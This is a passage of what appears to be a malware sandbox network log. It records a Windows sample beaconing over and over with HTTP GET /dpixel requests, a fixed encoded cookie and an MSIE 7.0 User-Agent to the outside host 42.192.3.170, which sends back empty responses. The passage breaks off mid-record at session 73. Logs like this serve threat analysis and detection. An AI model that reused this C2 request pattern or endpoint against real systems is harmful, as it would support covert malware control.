                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:20 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:20 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  45          192.168.2.4  49945        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:22 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:22 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:22 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  46          192.168.2.4  49957        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:24 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:24 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:24 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  47          192.168.2.4  49966        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:25 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:26 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:26 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  48          192.168.2.4  49982        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:27 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:28 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:28 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  49          192.168.2.4  49993        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:29 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:30 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:30 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  50          192.168.2.4  50005        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:31 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:32 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:32 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  51          192.168.2.4  50016        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:33 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:34 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  52          192.168.2.4  50030        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:35 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:36 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:35 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  53          192.168.2.4  50038        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:37 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:37 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  54          192.168.2.4  50052        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:39 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:39 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  55          192.168.2.4  50057        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:40 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:41 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:41 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  56          192.168.2.4  50058        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:42 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:43 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:43 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  57          192.168.2.4  50059        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:44 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:45 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:45 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  58          192.168.2.4  50060        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:46 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:47 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:46 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  59          192.168.2.4  50061        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:48 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:49 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:48 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  60          192.168.2.4  50062        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:50 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  61          192.168.2.4  50064        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:56 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:56 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:56 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  62          192.168.2.4  50065        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:58 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:58 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:58 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  63 | 192.168.2.4 | 50066 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:53:59 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:00 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:00 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  64 | 192.168.2.4 | 50067 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:01 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:02 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:02 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  65 | 192.168.2.4 | 50068 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:03 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:04 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:04 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  66 | 192.168.2.4 | 50069 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:05 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:06 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:06 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  67 | 192.168.2.4 | 50070 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:07 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:08 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:08 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  68 | 192.168.2.4 | 50071 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:09 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:10 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:10 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  69 | 192.168.2.4 | 50072 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:11 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:12 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:12 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  70 | 192.168.2.4 | 50073 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:13 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:14 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:14 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  71 | 192.168.2.4 | 50074 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:15 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:16 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  72 | 192.168.2.4 | 50075 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2025-01-03 01:54:18 UTC | 352 | OUT | GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:18 UTC | 114 | IN | HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:18 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  73 | 192.168.2.4 | 50076 | 42.192.3.170 | 443 | 6572 | C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp | Bytes transferred | Direction | Data
